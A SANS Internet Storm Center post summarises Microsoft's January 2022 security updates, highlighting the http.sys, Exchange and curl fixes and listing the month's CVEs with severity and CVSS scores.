Microsoft fixed 126 different CVEs with this month's update (this includes the Chromium issues patched in Edge). Six of the issues were publicly disclosed, and nine are rated critical. 

Noteworthy updates:

CVE-2022-21907: This is a remote code execution vulnerability in http.sys. http.sys is part of anything in windows processing HTTP requests (e.g. IIS!). But this vulnerability only affects the HTTP Trailer feature, which is not enabled by default (not sure if there is a good reason to enable it). HTTP trailers are used to delay sending headers until the end of the request (or response). They are typically used as part of chunked messages when the entire message is not known until the message has been sent. A "TE: trailers" header needs to be sent, and a "Trailer" header listing the delayed header names. This is potentially a wormable vulnerability, and Microsoft recommends prioritizing this patch. (this does not just affect IIS!)

CVE-2022-21846: Another critical remote code execution vulnerability in Exchange. But this vulnerability is not exploitable across the internet and requires the victim and the attacker to share the same network. 

CVE-2021-22947: This vulnerability in curl was originally disclosed in September, which is why it is noted as "Publicly Disclosed". This update fixes several vulnerabilities, not just the listed CVE.

See my dashboard for a more detailed breakout: https://patchtuesdaydashboard.com.

January 2022 Security Updates

Description CVE Disclosed Exploited Exploitability (old versions) current version Severity CVSS Base (AVG) CVSS Temporal (AVG) .NET Framework Denial of Service Vulnerability %%cve:2022-21911%% No No Less Likely Less Likely Important 7.5 6.5 Active Directory Domain Services Elevation of Privilege Vulnerability %%cve:2022-21857%% No No Less Likely Less Likely Critical 8.8 7.7 Chromium: CVE-2022-0096 Use after free in Storage %%cve:2022-0096%% No No - - -     Chromium: CVE-2022-0097 Inappropriate implementation in DevTools %%cve:2022-0097%% No No - - -     Chromium: CVE-2022-0098 Use after free in Screen Capture %%cve:2022-0098%% No No - - -     Chromium: CVE-2022-0099 Use after free in Sign-in %%cve:2022-0099%% No No - - -     Chromium: CVE-2022-0100 Heap buffer overflow in Media streams API %%cve:2022-0100%% No No - - -     Chromium: CVE-2022-0101 Heap buffer overflow in Bookmarks %%cve:2022-0101%% No No - - -     Chromium: CVE-2022-0102 Type Confusion in V8 %%cve:2022-0102%% No No - - -     Chromium: CVE-2022-0103 Use after free in SwiftShader %%cve:2022-0103%% No No - - -     Chromium: CVE-2022-0104 Heap buffer overflow in ANGLE %%cve:2022-0104%% No No - - -     Chromium: CVE-2022-0105 Use after free in PDF %%cve:2022-0105%% No No - - -     Chromium: CVE-2022-0106 Use after free in Autofill %%cve:2022-0106%% No No - - -     Chromium: CVE-2022-0107 Use after free in File Manager API %%cve:2022-0107%% No No - - -     Chromium: CVE-2022-0108 Inappropriate implementation in Navigation %%cve:2022-0108%% No No - - -     Chromium: CVE-2022-0109 Inappropriate implementation in Autofill %%cve:2022-0109%% No No - - -     Chromium: CVE-2022-0110 Incorrect security UI in Autofill %%cve:2022-0110%% No No - - -     Chromium: CVE-2022-0111 Inappropriate implementation in Navigation %%cve:2022-0111%% No No - - -     Chromium: CVE-2022-0112 Incorrect security UI in Browser UI %%cve:2022-0112%% No No - - -     Chromium: CVE-2022-0113 Inappropriate implementation in Blink %%cve:2022-0113%% No No - - -     Chromium: CVE-2022-0114 Out of bounds memory access in Web Serial %%cve:2022-0114%% No No - - -     Chromium: CVE-2022-0115 Uninitialized Use in File API %%cve:2022-0115%% No No - - -     Chromium: CVE-2022-0116 Inappropriate implementation in Compositing %%cve:2022-0116%% No No - - -     Chromium: CVE-2022-0117 Policy bypass in Service Workers %%cve:2022-0117%% No No - - -     Chromium: CVE-2022-0118 Inappropriate implementation in WebShare %%cve:2022-0118%% No No - - -     Chromium: CVE-2022-0120 Inappropriate implementation in Passwords %%cve:2022-0120%% No No - - -     Clipboard User Service Elevation of Privilege Vulnerability %%cve:2022-21869%% No No Less Likely Less Likely Important 7.0 6.1 Connected Devices Platform Service Elevation of Privilege Vulnerability %%cve:2022-21865%% No No Less Likely Less Likely Important 7.0 6.1 DirectX Graphics Kernel File Denial of Service Vulnerability %%cve:2022-21918%% No No Less Likely Less Likely Important 6.5 5.7 DirectX Graphics Kernel Remote Code Execution Vulnerability %%cve:2022-21912%% No No Less Likely Less Likely Critical 7.8 6.8 %%cve:2022-21898%% No No Less Likely Less Likely Critical 7.8 6.8 HEVC Video Extensions Remote Code Execution Vulnerability %%cve:2022-21917%% No No Less Likely Less Likely Critical 7.8 7.0 HTTP Protocol Stack Remote Code Execution Vulnerability %%cve:2022-21907%% No No More Likely More Likely Critical 9.8 8.5 Libarchive Remote Code Execution Vulnerability %%cve:2021-36976%% Yes No Less Likely Less Likely Important     Local Security Authority (Domain Policy) Remote Protocol Security Feature Bypass %%cve:2022-21913%% No No Less Likely Less Likely Important 5.3 4.8 Local Security Authority Subsystem Service Elevation of Privilege Vulnerability %%cve:2022-21884%% No No Less Likely Less Likely Important 7.8 6.8 Microsoft Cluster Port Driver Elevation of Privilege Vulnerability %%cve:2022-21910%% No No Less Likely Less Likely Important 7.8 6.8 Microsoft Cryptographic Services Elevation of Privilege Vulnerability %%cve:2022-21835%% No No Less Likely Less Likely Important 7.8 6.8 Microsoft Diagnostics Hub Standard Collector Runtime Elevation of Privilege Vulnerability %%cve:2022-21871%% No No Less Likely Less Likely Important 7.0 6.1 Microsoft Dynamics 365 (on-premises) Spoofing Vulnerability %%cve:2022-21891%% No No Less Likely Less Likely Important 7.6 6.6 Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability %%cve:2022-21932%% No No Less Likely Less Likely Important 7.6 6.6 Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability %%cve:2022-21954%% No No Less Likely Less Likely Important 6.1 5.3 %%cve:2022-21970%% No No Less Likely Less Likely Important 6.1 5.3 Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability %%cve:2022-21929%% No No Less Likely Less Likely Moderate 2.5 2.3 %%cve:2022-21930%% No No Less Likely Less Likely Important 4.2 3.8 %%cve:2022-21931%% No No Less Likely Less Likely Important 4.2 3.8 Microsoft Excel Remote Code Execution Vulnerability %%cve:2022-21841%% No No Less Likely Less Likely Important 7.8 6.8 Microsoft Exchange Server Remote Code Execution Vulnerability %%cve:2022-21846%% No No More Likely More Likely Critical 9.0 7.8 %%cve:2022-21855%% No No More Likely More Likely Important 9.0 7.8 %%cve:2022-21969%% No No More Likely More Likely Important 9.0 7.8 Microsoft Office Remote Code Execution Vulnerability %%cve:2022-21840%% No No Less Likely Less Likely Critical 8.8 7.7 Microsoft SharePoint Server Remote Code Execution Vulnerability %%cve:2022-21837%% No No Less Likely Less Likely Important 8.3 7.2 Microsoft Word Remote Code Execution Vulnerability %%cve:2022-21842%% No No Less Likely Less Likely Important 7.8 6.8 Open Source Curl Remote Code Execution Vulnerability %%cve:2021-22947%% Yes No Less Likely Less Likely Critical     Remote Desktop Client Remote Code Execution Vulnerability %%cve:2022-21850%% No No Less Likely Less Likely Important 8.8 7.7 %%cve:2022-21851%% No No Less Likely Less Likely Important 8.8 7.7 Remote Desktop Licensing Diagnoser Information Disclosure Vulnerability %%cve:2022-21964%% No No Less Likely Less Likely Important 5.5 4.8 Remote Desktop Protocol Remote Code Execution Vulnerability %%cve:2022-21893%% No No Less Likely Less Likely Important 8.8 7.7 Remote Procedure Call Runtime Remote Code Execution Vulnerability %%cve:2022-21922%% No No Less Likely Less Likely Important 8.8 7.7 Secure Boot Security Feature Bypass Vulnerability %%cve:2022-21894%% No No Less Likely Less Likely Important 4.4 3.9 Storage Spaces Controller Information Disclosure Vulnerability %%cve:2022-21877%% No No Less Likely Less Likely Important 5.5 4.8 Tablet Windows User Interface Application Core Elevation of Privilege Vulnerability %%cve:2022-21870%% No No Less Likely Less Likely Important 7.0 6.1 Task Flow Data Engine Elevation of Privilege Vulnerability %%cve:2022-21861%% No No Less Likely Less Likely Important 7.0 6.1 Tile Data Repository Elevation of Privilege Vulnerability %%cve:2022-21873%% No No Less Likely Less Likely Important 7.0 6.1 Virtual Machine IDE Drive Elevation of Privilege Vulnerability %%cve:2022-21833%% No No Less Likely Less Likely Critical 7.8 6.8 Win32k Elevation of Privilege Vulnerability %%cve:2022-21882%% No No More Likely More Likely Important 7.0 6.1 %%cve:2022-21887%% No No More Likely More Likely Important 7.0 6.1 Win32k Information Disclosure Vulnerability %%cve:2022-21876%% No No Less Likely Less Likely Important 5.5 4.8 Windows Accounts Control Elevation of Privilege Vulnerability %%cve:2022-21859%% No No Less Likely Less Likely Important 7.0 6.1 Windows AppContracts API Server Elevation of Privilege Vulnerability %%cve:2022-21860%% No No Less Likely Less Likely Important 7.0 6.1 Windows Application Model Core API Elevation of Privilege Vulnerability %%cve:2022-21862%% No No Less Likely Less Likely Important 7.0 6.1 Windows BackupKey Remote Protocol Security Feature Bypass Vulnerability %%cve:2022-21925%% No No Less Likely Less Likely Important 5.3 4.8 Windows Bind Filter Driver Elevation of Privilege Vulnerability %%cve:2022-21858%% No No Less Likely Less Likely Important 7.8 6.8 Windows Certificate Spoofing Vulnerability %%cve:2022-21836%% Yes No Less Likely Less Likely Important 7.8 7.0 Windows Cleanup Manager Elevation of Privilege Vulnerability %%cve:2022-21838%% No No Less Likely Less Likely Important 5.5 4.8 Windows Common Log File System Driver Elevation of Privilege Vulnerability %%cve:2022-21916%% No No More Likely More Likely Important 7.8 6.8 %%cve:2022-21897%% No No More Likely More Likely Important 7.8 6.8 Windows DWM Core Library Elevation of Privilege Vulnerability %%cve:2022-21852%% No No Less Likely Less Likely Important 7.8 6.8 %%cve:2022-21902%% No No Less Likely Less Likely Important 7.8 6.8 %%cve:2022-21896%% No No Less Likely Less Likely Important 7.0 6.1 Windows Defender Application Control Security Feature Bypass Vulnerability %%cve:2022-21906%% No No Less Likely Less Likely Important 5.5 4.8 Windows Defender Credential Guard Security Feature Bypass Vulnerability %%cve:2022-21921%% No No Less Likely Less Likely Important 4.4 3.9 Windows Devices Human Interface Elevation of Privilege Vulnerability %%cve:2022-21868%% No No Less Likely Less Likely Important 7.0 6.1 Windows Event Tracing Discretionary Access Control List Denial of Service Vulnerability %%cve:2022-21839%% Yes No Less Likely Less Likely Important 6.1 5.5 Windows Event Tracing Elevation of Privilege Vulnerability %%cve:2022-21872%% No No Less Likely Less Likely Important 7.0 6.1 Windows Extensible Firmware Interface Security Feature Bypass Vulnerability %%cve:2022-21899%% No No Less Likely Less Likely Important 5.5 4.8 Windows GDI Elevation of Privilege Vulnerability %%cve:2022-21903%% No No More Likely More Likely Important 7.0 6.1 Windows GDI Information Disclosure Vulnerability %%cve:2022-21904%% No No Less Likely Less Likely Important 7.5 6.5 Windows GDI+ Information Disclosure Vulnerability %%cve:2022-21915%% No No Less Likely Less Likely Important 6.5 5.7 %%cve:2022-21880%% No No Less Likely Less Likely Important 7.5 6.5 Windows Geolocation Service Remote Code Execution Vulnerability %%cve:2022-21878%% No No Less Likely Less Likely Important 7.8 6.8 Windows Hyper-V Denial of Service Vulnerability %%cve:2022-21847%% No No Less Likely Less Likely Important 6.5 5.7 Windows Hyper-V Elevation of Privilege Vulnerability %%cve:2022-21901%% No No Less Likely Less Likely Important 9.0 7.8 Windows Hyper-V Security Feature Bypass Vulnerability %%cve:2022-21900%% No No Less Likely Less Likely Important 4.6 4.0 %%cve:2022-21905%% No No Less Likely Less Likely Important 4.6 4.0 Windows IKE Extension Denial of Service Vulnerability %%cve:2022-21843%% No No Less Likely Less Likely Important 7.5 6.5 %%cve:2022-21883%% No No Less Likely Less Likely Important 7.5 6.5 %%cve:2022-21848%% No No Less Likely Less Likely Important 7.5 6.5 %%cve:2022-21889%% No No Less Likely Less Likely Important 7.5 6.5 %%cve:2022-21890%% No No Less Likely Less Likely Important 7.5 6.7 Windows IKE Extension Remote Code Execution Vulnerability %%cve:2022-21849%% No No Less Likely Less Likely Important 9.8 8.5 Windows Installer Elevation of Privilege Vulnerability %%cve:2022-21908%% No No More Likely More Likely Important 7.8 6.8 Windows Kerberos Elevation of Privilege Vulnerability %%cve:2022-21920%% No No Less Likely Less Likely Important 8.8 7.7 Windows Kernel Elevation of Privilege Vulnerability %%cve:2022-21879%% No No Less Likely Less Likely Important 5.5 4.8 %%cve:2022-21881%% No No More Likely More Likely Important 7.0 6.1 Windows Modern Execution Server Remote Code Execution Vulnerability %%cve:2022-21888%% No No Less Likely Less Likely Important 7.8 6.8 Windows Push Notifications Apps Elevation Of Privilege Vulnerability %%cve:2022-21867%% No No Less Likely Less Likely Important 7.0 6.1 Windows Remote Access Connection Manager Elevation of Privilege Vulnerability %%cve:2022-21885%% No No More Likely More Likely Important 7.8 6.8 %%cve:2022-21914%% No No More Likely More Likely Important 7.8 6.8 Windows Resilient File System (ReFS) Remote Code Execution Vulnerability %%cve:2022-21892%% No No Less Likely Less Likely Important 6.8 6.1 %%cve:2022-21958%% No No Less Likely Less Likely Important 6.8 6.1 %%cve:2022-21959%% No No Less Likely Less Likely Important 6.8 6.1 %%cve:2022-21960%% No No Less Likely Less Likely Important 6.8 6.1 %%cve:2022-21961%% No No Less Likely Less Likely Important 6.8 6.1 %%cve:2022-21962%% No No Less Likely Less Likely Important 6.8 6.1 %%cve:2022-21963%% No No Less Likely Less Likely Important 6.4 5.6 %%cve:2022-21928%% No No Less Likely Less Likely Important 6.3 5.7 Windows Security Center API Remote Code Execution Vulnerability %%cve:2022-21874%% Yes No Less Likely Less Likely Important 7.8 6.8 Windows StateRepository API Server file Elevation of Privilege Vulnerability %%cve:2022-21863%% No No Less Likely Less Likely Important 7.0 6.1 Windows Storage Elevation of Privilege Vulnerability %%cve:2022-21875%% No No Less Likely Less Likely Important 7.0 6.1 Windows System Launcher Elevation of Privilege Vulnerability %%cve:2022-21866%% No No Less Likely Less Likely Important 7.0 6.1 Windows UI Immersive Server API Elevation of Privilege Vulnerability %%cve:2022-21864%% No No Less Likely Less Likely Important 7.0 6.1 Windows User Profile Service Elevation of Privilege Vulnerability %%cve:2022-21919%% Yes No More Likely More Likely Important 7.0 6.3 %%cve:2022-21895%% No No Less Likely Less Likely Important 7.8 6.8 Windows User-mode Driver Framework Reflector Driver Elevation of Privilege Vulnerability %%cve:2022-21834%% No No Less Likely Less Likely Important 7.0 6.1 Workstation Service Remote Protocol Security Feature Bypass Vulnerability %%cve:2022-21924%% No No Less Likely Less Likely Important 5.3 4.8

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. január 11.

ISC Stormcast For Tuesday, January 11th, 2022 https://isc.sans.edu/podcastdetail.html&#x3f;id=7830, (Tue, Jan 11th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. január 10.

ISC Stormcast For Monday, January 10th, 2022 https://isc.sans.edu/podcastdetail.html&#x3f;id=7828, (Mon, Jan 10th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.